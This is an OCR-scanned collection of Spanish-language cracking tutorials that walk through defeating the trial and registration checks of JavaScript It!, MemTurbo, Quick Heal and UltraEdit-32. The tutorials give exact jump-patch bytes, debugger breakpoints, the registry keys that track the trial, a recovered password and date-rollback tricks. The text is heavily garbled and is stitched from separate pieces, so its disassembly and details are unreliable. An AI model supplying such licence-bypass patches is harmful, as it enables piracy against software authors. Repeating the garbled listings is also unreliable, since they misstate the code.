:00424C30 7410 je 00424C42 —-Nuestro amigo 


* Possible StringData Ref from Code Ob] ->"written by Gary Calpo" 


:00424C32 BABCCE4000 mov edx, 0040CEBC 


:00424C37 8D4DD8 lea ecx, dword ptr [ebp-28] 


* Reference To: MSVBVM50.  vbaStrCopy, Ord:0000h 


:00424C3A FF15B4E44200 Call dword ptr [0042E4B4] 


:00424C40 EB4A jmp 00424C8C -- Importante 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00424C30(C) 


Possible StringData Ref from Code Obj ->"You have " 


:00424C42 68ECCE4000 push 0040CEEC 
:00424C47 E8542C0000 call 004278A0 
:00424C4C 50 push eax 


Haber resumiendo!! tenemos un salto condicional en 00424C30 que si se ejecuta nos muestra los dias de evaluacion 
mediante el You have y otro aviso similar que hay debajo de ese, bueno pues hagamos que no se ejecute el salto, y 
nunca llegara a You have, ya que antes de llegar se encuentra con un salto incondicional en 00424C40 que nos saca 
volando, evitando que se impriman los avisos, osea que tenemos que inutilizar el salto condicional de 00424C30. 
cambiamos 


00424C30 7410 je 00424C42 Por 


00424030 90 nop 


00424C31 90 nop 


localizamos la direccion de offset de nuestro salto 24030 y vamos al editor HEX cambiamos 


7410 por 9090 


Asunto solucionado, pero todavía se puede mejorar este crack evitando que se impriman avisos similares como en el 
about, pero eso lo dejo como deberes del manual. 


Nada mas espero que os sirva de ayuda a todos los que empezais a crackear. 


Y acordaros de restaurar la fecha de vuestro Windows. 


Pues esto es todo. Que os a parecido.. interesante no¿? Como siempre mi mayor deseo es que entedais esto como yo 
intento explicarlo. 


Un saludo para todos/as (karpoff) 


como siempre cualquier duda podeis contar con migo. 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 


Email Kf_karpofffthotmail.com 


URL: http://welcome.to/karpoff http://karpoff.tsx.org http: //karpoff.welcome.to 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre Ingenieria Inversa y Programacion. 


Email "Colabora con tus Proyectos" 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


WKT Tutorialz Site 


Whiskey Kon Tekila 


Programa Java Script It ! v 1.3 W95 / W98 / NT 
Descripción Programa para hacer applets java facilmente. 


| Tipo [Serial 


Url http://www.computan.on.ca/-todd/JavaScripit! 
Protección Limitacion del numero de ejecuciones a 15 veces. 


| Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 


Introducción 


Pues otro programilla hesho en Visual Basic 5, parece que crecen como enanos estos programas hecho en 
dicho lenguaje, y como el autor no haya hecho una release, la proteccion se las trae de 'difisil', asi que vamos a ver 
lo duro que es!!!. XD 


hd 


Al Atake 


Pues vamos al tajo, despues de observar el programa pues sin complicarnos mucho, probamos con el breakpoint que funciona en el 70% o mas, de los 
mensajes que sacan los programadores en visual basic diciendonos que no es correcto lo que hemos introducido, ese breakpoint es el rtemsgbox, pero en 
esta ocasion no nos es muy util ;( pero bueno, hay otras cositas como probar mas breakpoints (¡¡¡ que hay muchos sin explorar, por lo menos por mi parte 
111), pero en esta ocasion nos vamos directamente al Smartcheck, lo ejecutamos --> introducimos nuestros datos --> nos sale el mensaje de error y paramos 
el programa. Hechamos una visual (nunca mejor dicho) y nos encontramos con lo siguiente: 


$ bb6b644644440+4 
Lo fe fe fe Le £e Le Le £e £e 


lui 
ES 


+ 
fe fe 


9% 


Mid VARIANT:ByRef String: "sielesie...”, long:3, VARIANT:Integer:1] 
Mid VARIANT:ByRef String: "sielesie...”, long:9, VARIANT:Integer:1] 
Mid VARIANT:ByRef String: "sielesie...”, long:9, VARIANT: Integer: 1] 
MidVARIANT:ByRef String: "'sielesie...', long:9, VARIANT:Integer:1] 
MidARIANT:ByRef String: "sielesie...”, long:9, VARIANT:Integer:1] 
MidVARIANT:ByRef String: "'sielesie...', long:9, VARIANT:Integer:1] 
MidvARIA4NT:ByRef String: "'sielesie...”, long:3, VARIANT:Integer:1] 
Mid VARIA4NT:ByRef String: "sielesie...”, long:9, VARIANT: Integer: 1] 
Mid VARIANT:ByRef String: "sielesie...”, long:9, VARIANT: Integer: 1] 
Len[String:"sielesie...”] returns LONG:9 

txtPassword. Text 

LCaselYARIANT:String:""37777"] 

Len VARIA4NT String: 6jy¡B(...'") retums LONG:7795256 

MsgBox VARIANT:String: "Registra..." Integer:48, VARIANT: String: "Error", VARIANT:Missing, VARIANT:Missing) returns Integer: 1 


B cmdOk_Click 
£ cmdCancel_Click 
B fimiavaScriptlt_Unload 


Vemos claramente, el password que he introducido '77777' y vemos 2 lineas mas abajo la instruccion msgbox del visual basic donde nos dice que no 
estamos registrado, PERO ¿que koño es la linea que hay entre media? ummm, vamos a ver, mas detenidamente: 


JSCRIPT.EXE!0008573E [no debug info] 
[2)- string (variant) 
E String .bstial = DOS454EC 
="15OjybOjyjs" 


Que cadena mas rara, gusto antes del msgbox y despues de mi password, nuse, nuse, pero pa mi ke tiene una PINTA de ser el password correcto que 
te cagas. Asi que prueba a ver.... es esa, verdad? XD. ; 


Hasta la proxima, ...Un Saludo. 


5 
vn 
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HH Tutoríal de Crackeo Para Newbies desde Cero 30/11/99 


Por Karpoff ii KARPOFF-NEW 98/99 ¿Hit 


PROYECTO 16 HH 


- MemTurbo V1.5 


INTRODUCCION 


Hola peña vamos a por el proyecto 16, si habeis seguido todos desde el n*1 ya no sois newbies, sois la 
nueva generacion de Crackers jejeje :-) 


Bueno otro mas, en este manual vamos a cambiar la forma tipica de crackeo que se muestra generalmente en 
los manuales. osea, no vamos a buscar el mensaje de expiracion, o el de serial number incorrect etc. y a 
partir de los mensajes buscar un salto y modificarlo. Hoy utilizaremos una herramienta que ya conocemos 
que es genial y que parece que se usa muy poco ya que no se ve en ningun manual, se trata de APIS32 
V2.4, la ultima vez que utilizamos esta herramienta ( en mis manuales ) fue para que nos mostrase la 
funcion que debiamos utilizar como break point o punto de ruptura en el Soflce, hoy esta herramienta nos 
evitara un costoso trabajo, ya que vamos a Crackear este programa mediante las Apis de Windows es decir 
vitaremos qu 1 programa lea los datos que guarda en el registro de Windows y que le informan del 
tiempo que queda de evaluacion. Las APIS mas utilizadas para este tipo de procedimientos son las 
siguientes. 


RegCloseKey /a /exa Cierra una Clave en el registro de windows 


RegCreateKey /A /Exa - Crea una Clave en el registro de Windows 
RegDeleteKey /A /Exa -— Borra una clave en el registro de Windows 
RegO0penKey /A /Exa - Abre una clave en el registro de Windows 
RegQueryValueA /Exa - Lee una Clave en el registro de Windows 


Evidentemente hay algunas mas. 


Primero quiero aclarar que cuando empece a crackear este programa segui el tipico procedimiento de 
evitar que el programa Ccaducase y evitar el nag mediante los mensajes de expired program etc. Y fue 
bastante engorroso, Pero cuando fui a probar si funcionaba bien el crack, me di cuenta de casualidad que 
este crack solo funcionaba durante su periodo de 30 dias pasados los 30 dias el programa aparentemente 
seguia funcionando no daba errores todo normal, pero casualmente no hacia la unica funcion que tenia 
que hacer que es la de recuperar memoria en Windows jejeje, me quede tan sorprendido que probe con la 
version anterior la v1.0b y lo mismo, y se me ocurrio probar los cracks que tenemos en astalavista y 
curiosamente no valen ninguno, parece que se ha pasado por alto que si el programa lee una determinada 
Clave del reg de windows, por mucho que evitemos los mensajes de expiracion el programa no funciona, el 
programador a sido muy cuco, ya que cuando existe una proteccion de este tipo generalmente si lees las 
ayudas del programa, el propio programador te informa de que si utilizas el programa cuando ha pasado la 
evaluacion este funcionara mal, como es el caso del English-Spanish Interpreter. 


Y a vosotros que coño os importa eso?? Bueno lo que intento decir es lo que os he dicho, que siempre nos 
guiamos mediante los mensajes de error y a partir de hay atacamos, pero yo siempre os digo que probeis 
cualquier cosa que se os ocurra y comprobar siempre que el crack funcione a la perfeccion, es bueno 
tener esa costunbre obtendreis muy buenos resultados. 


PRIMERA PARTI 


E 


La victima es MemTurbo V1.5 la ultima y recien salida version de esta gran utilidad, que desfragmenta la 
memoria Ram liberandola, ya que Windows nos agota la memoria enseguida utiliza toda la que tenemos da 
igual 64 MB que 128 si poneis un medidor vereis que siempr sta bajo minimos, esta utilidad nos 
soluciona el problemilla. El programa lo podeis coger de: 


http: //www.memturbo.com/downloads/memturbo.exe 


HERRAMIENTAS 


FileMon V4x ( he no tiene nada que ver con Mortadelo, que quede claro) 


TechFacts 98 o 95 


APIS32 V2.4 


W32Dasm 8.93 


Editor Hex (el que mas os guste) 


COMPORTAMIENTO DEL PROGRAMA 


Tenemos 30 dias de evaluacion, pasados los 30 dias el programa deja de funcionar mostrandonos una 
pantalla con un texto para la ocasión, no tenemos opcion de registrar el programa mediante los tipicos 
procedimientos. 


ATAKI 


[51] 


Lo primero averiguar como y por que sabe el programa que han pasado 30 dias, una vez averiguado evitar 
que lea los datos que le indican la evaluacion o si lee los datos modificaremos el codigo para que se 
comporte siempre como si estariamos evaluando el programa. Este atake es muy util en programas que se 
ejecutan sin ningun tipo de limitacion, como nag, funciones desvilitadas etc. durante la evaluacion, es 
logico pensar que si durante 30 dias el programa funciono perfectamente hay algo que le esta indicando 
los dias que van pasando, puede ser un archivo .ini, o cualquier otro tipo de archivos o lo mas logico 
una Claves o keys en el reg de Windows. 


SEGUNDA PARTE 


A TRABAJAR 


Como siempre lo primero prepararnos todo para trabajar comodamente, hacemos una copia del ejecutable 
MemTurbo.exe y le ponemos el nombre Turbo.exe y dejamos los dos ejecutables en el mismo directorio. 


Como podemos averiguar que es lo que le indica a MemTurbo.exe los dias de evaluacion que nos quedan?? Lo 
primero tenemos que averiguar si MemTurbo.exe lee el tiempo de evaluacion de un archivo o de el registro 
de Windows, descartemos posibilidades vamos a ejecutar el FileMon, os recomiendo que cerreis todos los 
programas que teneis en memoria, como puede ser un antivirus, o cualquier otro asi el filemon nos 
mostrara informacion solo sobre MemTurbo.exe pos eso, ejecutamos el Filemon y seguidamente MemTurbo.exe 
justo cuando se termine de ejecutar MemTurbo.exe vamos al filemon y pulsamos capture (el boton de la 
lupa), y analizamos el mogollon de eventos, pero todo son lecturas de ficheros de sistema, no hay nada 
que nos indique que tenemos un archivo que le informa del tiempo de evaluacion. ( este proceso podia 
saltarmelo, pero en los manuales siempre indicamos el camino final nunca se dice por todo lo que se paso 
y todo lo que se probo hasta llegar a la solucion, haciendo que parezca que se acierta a la primera, y 
no es asi.) 


Dicho lo dicho traceemos el registro de Windows, para ello tenemos el RegMon pero no lo vamos a utilizar 
por que es tanta la informacion que nos da que complica muchisimo el localizar lo que queremos como 
sustituto tenemos el fabuloso TechFacts 95/98, ciertamente esta utilidad tambien nos sustituye al 
filemon, nos va ha mostrar solo los cambios que realice MemTurbo.exe tanto en el disco duro, 
archivos.ini, registro de Windows etc.( si no teneis esta herramienta la podeis bajar de mi web y teneis 
un manual sobre como crackearla) 


Para realizar este proceso ejecutamos TechFacts vamos a Tools pulsamos Watach System, activamos la 
casilla Run This Program y seleccionamos MemTurbo.exe, como muestra la imagen. 


CAWINDOWSNWIN.INI 
CAWINDOWSASYSTEM.INI 


Bien una vez que tenemos seleccionado Menturbo.exe pulsamos el boton GO que no se muestra en la imagen 
pero esta abajo, y TechFacts empezara a comprobar como esta nuestro sistema, hara una imagen y cuando 
termine empezara la ejecucion de MemTurbo.exe, hará otra comprobacion para ver los cambios y nos los 
mostrara. En mi caso esto fue lo que me mostro. 


No changes made to INI file: C:IWINDOWSAWIN.INI 


No changes made to INI file: C:XWINDOWSASYSTEM.INI 


Registry key values changed: (4) 


HKEY_USERSY .DEFAULTASoftwareIMicrosoftYWindows1CurrentVersionExplorerlDataViewStream-MT15 


Value "Settings-MT15": from "A0,E4,15,90,DD,6C,C0,01" to "80,FF,EB,DC,DD,6C,C0,01" 


HKEY_CURRENT_USERASoftwareYMicrosoftYWWindowslXCurrentVersionExploreriDataViewStream-MT15 


Value "Settings-MT15": from "A0,E4,15,90,DD,6C,C0,01" to "80,FF,EB,DC,DD,6C,C0,01" 


Esta clarisima la importancia que tienen que tener estas claves no os parece ?, pensemos como podemos 
comprobar que son estas las claves que verifican la evaluacion, lo que se me ocurre es adelantar la 
fecha para Caducar el programa y comprobarlo , es muy importante que salvemos esas claves del registro 
antes de adelantar la fecha, y creo que no hara falta que diga que no toquiteeis nada en el reg de 
windows solo lo que yo os diga, por que el resultado puede ser caotico. 


Bueno ejecutamos RegEdit si alguien no sabe que es, Regedit es el editor del registro de Windows por lo 
general no tenemos ningun icono para poder acceder, pero podemos ejecutarlo desde el directorio de 
Windows donde vereis un archivo con un iconito azul llamado Regedit.exe, o desde el menu de inicio de 
windows pulsamos ejecutar e insertamos la palabra regedit.exe pulsamos Return y se habre el editor, 
Buscamos las Cadenas y las exportamos completas, para exportarlas seleccionais la carpeta que contiene 
la clave y pulsais en el menu, en registro, exportar archivo de registro, y guardais cada exportacion 
con el nombre que mas os guste, hacemos lo mismo con las 2 claves. (esto que se muestra abajo son las 
Carpetas del registro donde se encuentran las claves a exportar, teneis que exportar las carpetas 
completas, (seleccionando lo que estan en rojo y exportais) y dentro de ellas iran los valores que 
tienen.) 


HKEY_USERSY .DEFAULTASoftwareWMicrosoftYWindows1CurrentVersionExplorerlDataViewStream-MT15 


HKEY_CURRENT_USERASoftwareWMicrosoftYWWindowslXCurrentVersionExploreriDataViewStream-MT15 


Una vez exportadas la 2 claves adelantamos la fecha de Windows 2 meses, aseguraros de no tener ningun 
programa abierto que pueda sufrir algun tipo de modificacion al adelantar la fecha, dicho esto y con la 
fecha adelantada ejecutamos MemTurbo.exe y... Claro toma!! el pantallon que nos dice que se paso el 
tiempo de evaluacion, como veis no hay opcion de que siga funcionando, a no ser que nos registremos J , 
osea que cerramos la ventana y ya no hay manera de que funcione MemTurbo. Bien ahora restauramos la 
fecha de Windows ejecutamos nuevamente MemTurbo.exe y sigue sin funcionar Jejeje que putada no? Hagamos 
lo siguiente, de momento no vamos a restaurar las claves que hemos salvado, primero recomiendo que 
eliminemos las claves del registro de Windows, asi que las localizamos y las eliminamos completas, osea 
lo que marco en rojo tambien que son las carpetas que contienen las claves. 


HKEY_USERSY .DEFAULTASoftwareWMicrosoftYWindowsYCurrentVersionExplorerlDataViewStream-MT15 


Value "Settings-MT15": from "A0,E4,15,90,DD,6C,C0,01" to "80,FF,EB,DC,DD,6C,C0,01" 


HKEY_CURRENT_USERASoftwareYIMicrosoftYWWindowslXCurrentVersionExploreriDataViewStream-MT15 


Value "Settings-MT15": from "A0,E4,15,90,DD,6C,C0,01" to "80,FF,EB,DC,DD, 6C,C0,01" 


Y ejecutamos nuevamente MemTurbo.exe y vemos que funciona perfectamente si traceamos con TechFacts 
veremos que se han creado unas Claves nuevas por lo tanto no hace falta restaurar las anteriores, (si a 
alguien no le funcionase que restaure las claves que tenemos exportadas pero estoy seguro de que no 
tendreis problemas ). 


Bueno ya hemos averiguado que estas claves son las que le informan a MemTurbo de la evaluacion, si 
probais a tracear dos o tres ejecuciones seguidas vereis que siempre las modifica, que podemos hacer 
ahora?? 


Pos muy sencillo buscar en MemTurbo.exe la Api encargada de hacer esta comprobacion, yo pienso que la 
comprobacion se hara mas o menos asi. Mediante RegOpenKey /A /exa Habrira las claves con RegQueryValue 
/A /exa comprueba el valor de la clave y se calculan los dias de evaluacion y con RegCloseKey /a /exa 
cierra la la parte encargada de esta comprobacion, si evitamos o intentamos modificar la funcion que 
hace RegOpenKey /A /exa podemos evitar que expire el programa, pero como localizamos la api exacta que 
realiza este trabajo, ya que en un programa a parte de estas claves seguro que se comprueban muchisimas 
otras, podiamos utilizar el Softlce y despues de algunas traceadas localizariamos sin duda la que nos 
interesa, pero nos vamos a ahorrar mucho trabajo si utilizamos APIS32 V2.4 que insisto en que es una 
herramienta mucho mas util de lo que os pensais. Ale Pues manos a la obra 


Ejecutamos Apis32 y veremos esta imagen. 


132: RegoClosekey [| HáNDLE ] 
: ReoConnectRegistryá, [ LPSTR, HANDLE, LPDATA ] 
: RegConnectRegistrw' [ LPWSTA, HANDLE, LPDATA ] 
: RegCreateKeyá [ HANDLE, LPSTR, LPDATA ] 
: RegCreateKeyExá [ HANDLE, LPSTR, DWORD, LPSTR, DWORD, DWORD, 
: RegCreateKeyw' [ HANDLE, LPWSTA, LPDATA ] 
: RegDeleteKeyá [ HANDLE, LPSTR ] 
: RegDeleteKeyw' [ HANDLE, LPWSTR ] 
: RegDeleteWalueó, [ HANDLE, LPSTA ] 
: RegDeleteWaluew' [ HANDLE, LPWSTR ] 
: RegEnumkKeyó [ HANDLE, DWORD, LPSTR, DWORD ] 
: RegEnumkKeyExó [ HANDLE, DWORD, LPSTR, LPDATA, LPDATA, LPSTR, 
: RegEnumkKeyw* [ HANDLE, DWORD, LPWSTA, DWORD ] 
: RegEnumvV'alueá, [ HANDLE, DWORD, LPSTA, LPDATA, LPDATA, LPDATA, L- 
: RegFlushKey [ HANDLE ] 
: ReaGetKeyS ecurity [ HANDLE, DWORD, LPDATA, LPDATA 1 


Expliquemos algo sobre esta herramienta. Es imprescindible que tengais bien configurada APIS32, por lo 
menos que se encuentren la lista de APIs que utiliza el programa en cuestion, para incluir APIs en la 
lista tenemos la Opcion add que vemos en la imagen, si pulsais sobre ese boton os mostrara una lista con 
los archivos habituales que utiliza Windows y al seleccionar uno de los archivos os mostrara toda la 
lista de Apis que pueden ser importadas de cada uno de los archivos, o tambien una vez que hemos 
seleccionado el programa que vamos a tracear podemos pulsar sobre imports y nos mostrara todas las 
funciones (APIs) que utiliza ese programa en este caso el MemTurbo, y a partir de hay podemos introducir 
las que queramos, para introducirlas en Apis32 podeis seleccionarlas 1 a 1 solo las que os interese o 
todas de golpe con la opcion add all, no recomiendo introducir todas ya que el informe que nos muestra 
cuando utilicemos Apis32 puede ser demasiado lioso, en este Caso con que esten las Apis que manejan el 
registro de Windows es suficiente. 


Solo nos queda pulsar sobre Run y ver que ocurre, osea que pulsamos y MemTurbo empieza a ejecutarse 
vemos como se va creando un listado de informacion en la ventana de Apis32, como es de suponer una vez 
que MemTurbo ya se ha ejecutado este habra realizado todas las comprobaciones en el registro de Windows 
no?, bueno pues tendreis en pantalla una ventana como esta, que variara su contenido dependiendo de las 
Apis con que tengais configurado APIS32. 


00419424: GetCommandLinea () 

00419430: GetCommandLineA = S8l163CA3C 

00420502: CreateMailslotW(LPWSTR: 00000001 DWORD: 0045FD50,DWORD: 00000001, 
004205C58:CreateMailslot'i = O 

0041DFCF: GetModuleFileNamea (HANDLE : 00000000,LPSTR: 00473048, DWORD: 000001 
0041DFD5:GetModuleFileNameA = 21 

00421409: GetModuleHandleáA (LPSTR: 0045FE64: "KERNEL32") 


00421A0F: GetModuleHandleA = BFF70000 
00419478: GetModuleHandleA(LPSTR: 00000000) 


En este momento pulsamos sobre Save LOG y cerramos tanto APIS32 como MemTurbo, y en el directorio donde 
tengais instalado MenTurbo V1.5 se ha creado un archivo llamado MemTurbo.log, donde se encuentran todos 
los datos del proceso de ejecucion, ale vamos a editarlo y ver su contenido, ...... 


Como veis hay mucha información sobre todas las funciones que importa MemTurbo, pero Nosotros de momento 
solo necesitamos las funciones del registro de Windows y en mi .log veo esto. 


004082C5:RegOpenKeyExA (HANDLE :80000001,LPSTR:004719F4: 
"SoftwareWMicrosoftYWindowsYCurrentVersionlExplorerl DataViewStream-MT15.., 
DWORD:00000000,DWORD:00000003,LPDATA:006DF5F8) 


004082CB: RegOpenKeyExA = O 


00408357:RegCreateKeyExA (HANDLE :80000001,LPSTR:004719F4: 
"SoftwarelMicrosoftYWindows*XCurrentVersionExploreriDataViewStream-MT15.., 
DWORD :00000000,LPSTR:0046E820:"REG_BINARY",DWORD:00000000,DWORD 


:000F003F, LPDATA:00000000,LPDATA:006DF5F4,LPDATA:006DF5F0) 


0040835D: RegCreateKeyExA = 0 


004083A6: RegSetValueExA (HANDLE :C29AFACO, LPSTR:004719E4: "Settings-MT15", 
DWORD:00000000,DWORD:00000003,LPDATA:006DF5DC,DWORD:00000008) 


004083AC: RegSetValueExA = 0 


004083D2: RegCloseKey (HANDLE :C29AFACO) 


004083D8: RegCloseKey = O 


00408439:RegCreateKeyExA (HANDLE:80000001,LPSTR:00471A3C: 


"SoftwareNMicrosoftYWindowsXCurrentVersionExploreriDataViewSettings-MT..,DWORD:00000000, LPSTR: 
0046E820:"REG_BINARY", 


0040843F: RegCreateKeyExA = 0 


DWORD:00000000,DWORD:000F0O03F,LPDATA:00000000, LPDATA:006DF5F4,LPDATA:006DF5F0) 


Bueno como digo entre muchisimos otros datos estos son los registros que me parecen muy interesantes, si 
os fijais en rojo tenemos las claves que habiamos localizado con TechFacts98 , vemos que Api las 
manipula e incluso nos muestra la direccion de memoria de la Api que realiza las comprobaciones, 
seguramente para localizar esto con el Softlce hubiesemos dado muchas vueltas, ahora vamos a pasar a la 
parte del desensamblado. 


Teniamos MemTurbo.exe y una copia de este con el nombre Turbo. 


y con el editor Hex editamos Turbo.exe 


Xx 


bueno pues desensamblamos MemTurbo.exe 


La direccion de memoria donde se habre por primera vez la clave que nos interesa es 004082C5 


004082C5:RegOpenKeyExA (HANDL] 


veamos que hay en esa direccion de memoria, 


buscamos la direccion 004082C5 y nos lleva a: 


* Reference To: ADVAPI 


:004082C5 


:004082CB 


:004082CD 


:004082CF 


:004082 


:004082 


:004082 


:004082 


:004082 


DO 


D3 


D8 


DB 


DF 


:004082E5 


:004082E8 


FF150C704500 


6A48 


6A00 


57 


8945F0 


E8180E0100 


83C40C 


83'7DF000 


0r84E2010000 


8D45C8 


50 


32.RegOpenKeyExA, Ord:0172h 


Call dword ptr [0045700C]--- AQUI 


push 00000048 


push 00000000 


push edi 


mov dword ptr [ebp-10], eax 


call 004190F0 


add esp, 0000000C 


cmp dword ptr [ebp-10], 00000000 


je 004084C7 ----- Que Interesante 


lea eax, dword ptr [ebp-38] 


push eax 


E:80000001,LPSTR:004719F4:"SoftwareYMicrosoftWWindows MCurrentVersionl 
ExplorerYDataViewStream-MT15..,DWORD:00000000,DWORD:00000003,LPDATA:006DF5F8) 


asi que en W32dasm con la opcion find (la linternita) 


Concretamente a la api que abre la clave del registro, lo que aquí parece que ocurre es: RegOpenKeyExa 
abre la clave que utiliza memturbo para controlar la evaluacion, 
a traves de 004082D3 call 004190F0 se decide si se ejecuta o no el salto condicional que hay en 004082DF 


estas comprobaciones se lian mogollon, 
este programa, 


y mediante una serie de comprobaciones 


podeis tracearlo con el SoftICE, yo no lo hice cuando crackee 
pero posterior si lo tracee y si quereis aprender mas os recomiendo que pilleis el 


SoftIce poneis un Break Point a 004082d3 y empezais a tracear a partir de esa Call. Vereis la de vueltas 
que damos para arriba y abajo hasta llegar a el salto 004082adf. 


Bueno pues probemos a invertir el salto convirtiendolo en un jne y veamos los resultados, localizamos el 
offset de 004082DF je 004084C7 Que se muestra en la parte inferior de W32dasm, en la barra de estado, y 
es 000082DFh los ceros no se ponen y la "h" tampoco, asi que vamos al editor Hex y el cambio que 
tenemos que hacer es 


cambiamos 004082DF 0F84E2010000 je 004084C7 


por 004082DF 0F85E2010000 jne 004084C7 


para hacer el cambio metemos el offset 82DF en el editor Hex, con la opcion GOTO (dependiendo del 
Editor) y veremos esto (dependiendo del editor que se use en unos estan los numeros Juntos, en otros en 
pares etc. Pero siempre seran los mismos.) 


0F84 E201 0000 y cambiamos por 0F85 E201 0000 


salvamos los cambios y 


ya solo nos queda probar, para ver si hemos acertado tenemos que adelantar otra vez la fecha, osea que 
cerramos los programas que puedan sufrir alteracion por el cambio de fecha (versiones triales etc.) 
adelantamos 2 meses la fecha de Windows y ejecutamos el archivo Turbo.exe que es el que hemos modificado 
y Voooila ¡! parece funcionar probamos a ver si desfragmenta la memoria y asi es bien, cerremos 
Turbo.exe y restauremos la fecha, ahora probamos otra vez y sigue funcionando miramos otra vez si 
desfragmenta la memoria y efectiviwonder, el funcionamiento es perfecto. 


Pues como siempre espero que os sirva para adquirir conocimiento, para entender un poco mas esto del 
crackeo y principalmente para divertiros 


Ya sabeis que para cualquier duda podeis contar con migo, atiendo todos los email con preguntas, 
sugerencias, criticas etc. Pero no atiendo pedidos de Cracks. 


Un saludo a tod(fs 


Karpoff /TNT! 


EMAIL: Kf karpofff(hotmail.com 


URL: http://welcome.to/karpoff 


http://members.xoom.com/kf karpoff 


El uso de este material es solo para uso educativo, por ahora los cracks son 


ilegales cada cual es responsable del uso que le de a este tutorial, el autor no se 


hace responsable de nada. 


Karpoff Spanis 


Tutor 


Tutorial Descargado de 


Crackeando Quick Heal 


La victima: Quick Heal 
URL: www.quickheal.com 


Descripcion: Excelente virus scanner 

Dificultad: Principiante 

Objetivo: Simular estar registrado 

Cracker: Kolgado 

Ponemos un numero cualquiera,control-d y nos salta el softice,bpx getdlgitemtexta 

pa' probar y x, volvemos al programa,le damos ok y nos salta de nuevo el soft,un f12 y estamos en la rutina del programa,a partir de ahi 
podemos seguir dos caminos, 

analizar minuciosamente y ver como se comporta el codigo(útil si queremos un KeyGen.),o probamos darle fanaticamente £10 hasta que 
nos aparezca el mensaje de "error en el codigo" o algo por el estilo. 

Para no complicarnos demasiado(y porque tambien soy bastante nuevo para un keygen),probemos nuestra suerte con la segunda opcion. 
Le damos f10 19 veces, y a la 20 nos aparece la ventana "incorrect unlock code",le damos aceptar y aparecemos en: 


:00408D27 6880134400 push 00441380 


* Possible StringData Ref from Data Obj ->"Incorrect unlock code." 


| 
:00408D2C 6818244400 push 00442418 
:00408D31 E824D30100 call 00426054 


* Possible Reference to Dialog: DialoglD_0066, CONTROL_ID:0458, "" 


:00408D36 6858040000 push 00000458 "AQUI APARECEMOS" 
:00408D3B 8BCE mov ecx, esi 

:00408D3D E8C7580100 call 0041E609 

:00408D42 85C0 test eax, eax 

:00408D44 7504 ¡ne 00408D4A 

:00408D46 33C0 xor eax, eax 

:00408D48 EB03 jmp 00408D4D 


El call inmediatamente arriba de donde aparecimos fue el que provocó el mensaje, por lo tanto, 
busquemos un poco arriba para ver q' tenemos(hay q' buscar algun salto condicional). 


:00408CBO 50 push eax 

:00408CB 1 51 push ecx 

:00408CB2 ES6ECDFEFFF call 00405A25 
:00408CB7 83C408 add esp, 00000008 
:00408CBA 83F801 cmp eax, 00000001 
:00408CBD 7564 jne 00408D23 "LA CLAVE" 
:00408CBF E833CEFFFF call 00405AF7 
:00408CC4 Es438EFFFF call 00401BO0C 
:00408CC9 663D0200 cmp ax, 0002 
:00408CCD 7549 jne 00408D18 
:00408CCF FF761C push [esi+1C] 


No necesitamos ir muy lejos y nos encontramos un ¡nz 00408d18 y un poco mas arriba ¡nz 00408d23,ahora bien, esto no nos dice nada 
por si solo, 

asi que analicemos un poco.Si nos fijamos en jnz 00408d23(en w32dasm jne) nos damos cuenta de que en caso de hacer el salto 
apareceriamos unas cuantas 

instrucciones antes de nuestro famoso call q' produce el mensaje de error,exactamente en: 


:00408D21 EB31 jmp 00408D54 
:00408D23 6430 push 00000030 "AQUI" 
:00408D25 8BCE mov ecx, esi 


* Possible StringData Ref from Data Obj ->"Error" 

:00408D27 6880134400 push 00441380 

* Possible StringData Ref from Data Obj ->"Incorrect unlock code." 
:00408D2C 6818244400 push 00442418 

:00408D31 E824D30100 call 0042605A "NUESTRO MARTIRIO" 


Tambien podemos notar que inmediatamente arriba de push 30 esta un ¡mp que evitaria pasar por el call "de los lamentos". 
por lo que a simple vista pareceria ser que nuestro 00408cbd ¡nz 00408d23 seria lo q' distingue de estar o no registrados.Pero antes de 
sacar conclusiones a la ligera,probemos. 


Ponemos un bc*, y luego un bpx en 00408cbd,le damos control-d,le damos ok de nuevo a nuestra ventana de Registro y nos baramos en 
el bpx que hemos puesto. 

Vemos que realmente va a saltar,como suponiamos,asi q' probemos,total no perdemos nada (creo).En le softice le damos r fl z y se 
convierte "magicamente” en un "no jump". 

Ok el momento de la verdad,le damos bc*, y luego x, y pam!!!, un lindo mensaje... "Quick Heal has been upgrade to a complete..."No 
sweat.Ni siquiera necesitamos parcharlo,solo un cambio en un salto en tiempo de ejecucion y listo. 

Esperando que les sirva de ayuda.Atte. Kolgado. 

PD:Esta es la manera mas facil y es genial para los nuevos,si se animan le pueden dar con el keygen.Gracia a todos en el spanish 
reverse... 

FreeMind. 


Crackeando UltraEdit 32 


Okas como les comente en el curso anterior vamos a reventar al Sr. UltraEdit32 ..mas de 
uno se ha fijado que cada que lo abres aparece una pantallita diciendote que eres un 
usuario no registrado... Esa pantallita tan molesta tiene x nombre "NagScreen” .. y tiene la 
malvada labor de decirnos que somos unos jodidos y que no hemos pagado x usarlo ='( ..Hay 
que demostrarle que ya le “pagamos” ..jejejejeje.. i- ) Bueno es fácil.. =8-P ... Como te 
mencionaba hace rato si te fijas cada vez que abres el UltraEdit te aparecen los días que 
te restan para usar el programa ... 


0_) Thés is an unregistered copy of UlttaE dt-32 

Use of this program should bs on a temporary 
basis (45 Days max] for evaluation purposes 
onby. |fthis program is to be used for purposes 
other than evabualion please register this 
program 


Detads for registrabon can be found in the 
READ.ME file and in the 'Aboul' dialog box on 
the help mera 


va, ultraedit. com 


You hare E days left for evaluation 


Bueno lo primero que tenemos que hacer es colocar nuestro reloj de la PC un año después 
del actual estamos en el 2001 aun, entonces dejamos el día y la hora igual y cambiamos el 
año a 2002.. 


Propiedades de Fecha y hora 


K xl 
Fecha y hora | 
—Eecha ] — Hora 
[Diciembre y] [2002 pao 
| a % 
1238.67 , : 
8 9 10M 12 13 14 z > 
15 16 17 18 19 20 21 e . 
22 23 24 25 26 27 28 o es 
29 30 31 
(10:25: 42am +7 
Zona horaria - 


(GMT -06:00)] Ciudad de México 


| [Y Cambiar la hora automáticamente según el horario de verano 


si te fijas abre tu UltraEdit ahora y nos aparece ya una pantalla de que el programa expiro 
y nos pide nuestro + de Serie y el nombre ... mmmm 
esta vez no le vamos a meter nada...le damos cancelar.. =8-P 
